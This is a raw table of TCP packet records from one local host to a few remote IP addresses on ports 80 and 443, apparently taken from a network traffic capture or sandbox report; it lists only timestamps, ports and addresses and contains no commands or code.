| Dec 19, 2024 15:29:29.235177040 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.235234976 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.235260963 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.235320091 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.240068913 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.240125895 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.240149975 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.240207911 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.252108097 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.252168894 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.252191067 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.252332926 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.263724089 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.263786077 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.263887882 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.263943911 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.263968945 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.264022112 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.275535107 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.275592089 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.275630951 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.275774956 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.286587954 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.286657095 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.286681890 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.286820889 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.297435999 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.297502995 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.297518969 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.297665119 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.308444977 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.308528900 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.308549881 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.308599949 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.319281101 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.319370985 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.319380999 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.319432020 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.335974932 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.336170912 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.336179018 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.336230040 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.349515915 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.349584103 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.349601030 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.349651098 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.351811886 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.351878881 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.352037907 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.352096081 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.360327959 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.360414028 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.360423088 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.360471964 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.369111061 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.369185925 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.369201899 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.369254112 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.378091097 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.378149986 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.378171921 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.378225088 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.385133028 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.385195971 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.385216951 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.385266066 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.385293007 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.385344982 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.386341095 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.386399031 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.386466026 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.386585951 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.386646032 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.926505089 CET | 49733 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:30.046156883 CET | 80 | 49733 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:30.046241999 CET | 49733 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:30.046780109 CET | 49733 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:30.166666985 CET | 80 | 49733 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:31.375972986 CET | 80 | 49733 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:31.381685019 CET | 49733 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:31.501410961 CET | 80 | 49733 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:31.858283043 CET | 80 | 49733 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:31.912821054 CET | 49733 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:32.306704044 CET | 49738 | 443 | 192.168.2.5 | 104.21.67.152 |
| Dec 19, 2024 15:29:32.306737900 CET | 443 | 49738 | 104.21.67.152 | 192.168.2.5 |
| Dec 19, 2024 15:29:32.306813955 CET | 49738 | 443 | 192.168.2.5 | 104.21.67.152 |
| Dec 19, 2024 15:29:32.309828997 CET | 49738 | 443 | 192.168.2.5 | 104.21.67.152 |
| Dec 19, 2024 15:29:32.309845924 CET | 443 | 49738 | 104.21.67.152 | 192.168.2.5 |
| Dec 19, 2024 15:29:33.539686918 CET | 443 | 49738 | 104.21.67.152 | 192.168.2.5 |
| Dec 19, 2024 15:29:33.539897919 CET | 49738 | 443 | 192.168.2.5 | 104.21.67.152 |
| Dec 19, 2024 15:29:33.548127890 CET | 49738 | 443 | 192.168.2.5 | 104.21.67.152 |
| Dec 19, 2024 15:29:33.548187017 CET | 443 | 49738 | 104.21.67.152 | 192.168.2.5 |
| Dec 19, 2024 15:29:33.548616886 CET | 443 | 49738 | 104.21.67.152 | 192.168.2.5 |
| Dec 19, 2024 15:29:33.558500051 CET | 49738 | 443 | 192.168.2.5 | 104.21.67.152 |
| Dec 19, 2024 15:29:33.599384069 CET | 443 | 49738 | 104.21.67.152 | 192.168.2.5 |
| Dec 19, 2024 15:29:33.979136944 CET | 443 | 49738 | 104.21.67.152 | 192.168.2.5 |
| Dec 19, 2024 15:29:33.979332924 CET | 443 | 49738 | 104.21.67.152 | 192.168.2.5 |
| Dec 19, 2024 15:29:33.979420900 CET | 49738 | 443 | 192.168.2.5 | 104.21.67.152 |
| Dec 19, 2024 15:29:34.013520002 CET | 49738 | 443 | 192.168.2.5 | 104.21.67.152 |
| Dec 19, 2024 15:29:39.514564991 CET | 49733 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:39.634181976 CET | 80 | 49733 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:39.965440035 CET | 80 | 49733 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:40.006658077 CET | 49733 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:40.112746000 CET | 49756 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:40.112834930 CET | 443 | 49756 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:40.112930059 CET | 49756 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:40.113441944 CET | 49756 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:40.113481998 CET | 443 | 49756 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:41.482317924 CET | 443 | 49756 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:41.482639074 CET | 49756 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:41.484297037 CET | 49756 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:41.484354973 CET | 443 | 49756 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:41.484636068 CET | 443 | 49756 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:41.486027002 CET | 49756 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:41.527374029 CET | 443 | 49756 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:41.527621984 CET | 49756 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:41.527678013 CET | 443 | 49756 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:42.161178112 CET | 443 | 49756 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:42.161262035 CET | 443 | 49756 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:42.161442995 CET | 49756 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:42.162048101 CET | 49756 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:42.322235107 CET | 49733 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:42.323524952 CET | 49761 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:42.442353964 CET | 80 | 49733 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:42.442544937 CET | 49733 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:42.443135977 CET | 80 | 49761 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:42.443367004 CET | 49761 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:42.443367004 CET | 49761 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:42.562928915 CET | 80 | 49761 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:43.795205116 CET | 80 | 49761 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:43.796700001 CET | 49766 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:43.796767950 CET | 443 | 49766 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:43.796922922 CET | 49766 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:43.797785044 CET | 49766 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:43.797816038 CET | 443 | 49766 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:43.850430012 CET | 49761 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:45.163410902 CET | 443 | 49766 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:45.165707111 CET | 49766 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:45.165771961 CET | 443 | 49766 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:45.165890932 CET | 49766 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:45.165904999 CET | 443 | 49766 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:45.902652025 CET | 443 | 49766 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:45.902893066 CET | 443 | 49766 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:45.903141022 CET | 49766 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:45.903481007 CET | 49766 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:45.908139944 CET | 49772 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:46.027781010 CET | 80 | 49772 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:46.027873993 CET | 49772 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:46.028143883 CET | 49772 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:46.147869110 CET | 80 | 49772 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:47.349688053 CET | 80 | 49772 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:47.375129938 CET | 49776 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:47.375159025 CET | 443 | 49776 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:47.375240088 CET | 49776 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:47.385073900 CET | 49776 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:47.385086060 CET | 443 | 49776 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:47.397346020 CET | 49772 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:48.753539085 CET | 443 | 49776 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:48.755656004 CET | 49776 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:48.755681992 CET | 443 | 49776 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:48.755754948 CET | 49776 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:48.755770922 CET | 443 | 49776 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:49.397353888 CET | 443 | 49776 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:49.397444010 CET | 443 | 49776 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:49.397506952 CET | 49776 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:49.397898912 CET | 49776 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:49.401065111 CET | 49772 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:49.402112007 CET | 49781 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:49.521166086 CET | 80 | 49772 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:49.521373987 CET | 49772 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:49.521686077 CET | 80 | 49781 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:49.521780014 CET | 49781 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:49.521976948 CET | 49781 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:49.641823053 CET | 80 | 49781 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:50.827419996 CET | 80 | 49781 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:50.829540014 CET | 49785 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:50.829564095 CET | 443 | 49785 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:50.829653978 CET | 49785 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:50.829986095 CET | 49785 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:50.829998970 CET | 443 | 49785 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:50.881850958 CET | 49781 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:52.193840027 CET | 443 | 49785 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:52.196064949 CET | 49785 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:52.196094036 CET | 443 | 49785 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:52.196162939 CET | 49785 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:52.196172953 CET | 443 | 49785 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:52.938437939 CET | 443 | 49785 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:52.939990044 CET | 443 | 49785 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:52.940058947 CET | 49785 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:52.940454006 CET | 49785 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:52.999619007 CET | 49781 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:53.000608921 CET | 49791 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:53.119637012 CET | 80 | 49781 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:53.119708061 CET | 49781 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:53.120340109 CET | 80 | 49791 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:53.120417118 CET | 49791 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:53.120652914 CET | 49791 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:53.240221024 CET | 80 | 49791 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:54.436521053 CET | 80 | 49791 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:54.438038111 CET | 49796 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:54.438082933 CET | 443 | 49796 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:54.438169956 CET | 49796 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:54.438515902 CET | 49796 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:54.438532114 CET | 443 | 49796 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:54.491185904 CET | 49791 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:55.802407980 CET | 443 | 49796 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:55.804356098 CET | 49796 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:55.804382086 CET | 443 | 49796 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:55.804439068 CET | 49796 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:55.804446936 CET | 443 | 49796 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:56.563637018 CET | 443 | 49796 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:56.563721895 CET | 443 | 49796 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:56.563791990 CET | 49796 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:56.564399004 CET | 49796 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:56.568147898 CET | 49791 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:56.569798946 CET | 49802 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:56.688025951 CET | 80 | 49791 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:56.688153982 CET | 49791 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:56.689335108 CET | 80 | 49802 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:56.689431906 CET | 49802 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:56.689657927 CET | 49802 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:56.809374094 CET | 80 | 49802 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:58.008605003 CET | 80 | 49802 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:29:58.009996891 CET | 49806 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:58.010023117 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:58.010133982 CET | 49806 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:58.010354996 CET | 49806 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:58.010368109 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:58.053689003 CET | 49802 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:29:59.377213001 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:59.379338980 CET | 49806 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:59.379369974 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:29:59.379435062 CET | 49806 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:29:59.379447937 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:00.032085896 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:00.032321930 CET | 443 | 49806 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:00.032396078 CET | 49806 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:00.032768011 CET | 49806 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:00.035564899 CET | 49802 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:00.036631107 CET | 49811 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:00.155639887 CET | 80 | 49802 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:00.155714035 CET | 49802 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:00.156308889 CET | 80 | 49811 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:00.156387091 CET | 49811 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:00.156553030 CET | 49811 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:00.276015997 CET | 80 | 49811 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:06.891166925 CET | 80 | 49811 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:06.896367073 CET | 49827 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:06.896414995 CET | 443 | 49827 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:06.896529913 CET | 49827 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:06.896843910 CET | 49827 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:06.896857977 CET | 443 | 49827 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:06.944386959 CET | 49811 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:08.273334980 CET | 443 | 49827 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:08.311199903 CET | 49827 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:08.311223984 CET | 443 | 49827 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:08.311295986 CET | 49827 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:08.311309099 CET | 443 | 49827 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:08.989456892 CET | 443 | 49827 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:08.989543915 CET | 443 | 49827 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:08.989599943 CET | 49827 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:08.992734909 CET | 49827 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:09.010977983 CET | 49811 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:09.011718035 CET | 49833 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:09.130956888 CET | 80 | 49811 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:09.131035089 CET | 49811 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:09.131282091 CET | 80 | 49833 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:09.131510019 CET | 49833 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:09.131577969 CET | 49833 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:09.251094103 CET | 80 | 49833 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:19.378699064 CET | 80 | 49833 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:19.382277012 CET | 49859 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:19.382327080 CET | 443 | 49859 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:19.382404089 CET | 49859 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:19.382777929 CET | 49859 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:19.382797956 CET | 443 | 49859 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:19.428885937 CET | 49833 | 80 | 192.168.2.5 | 132.226.247.73 |
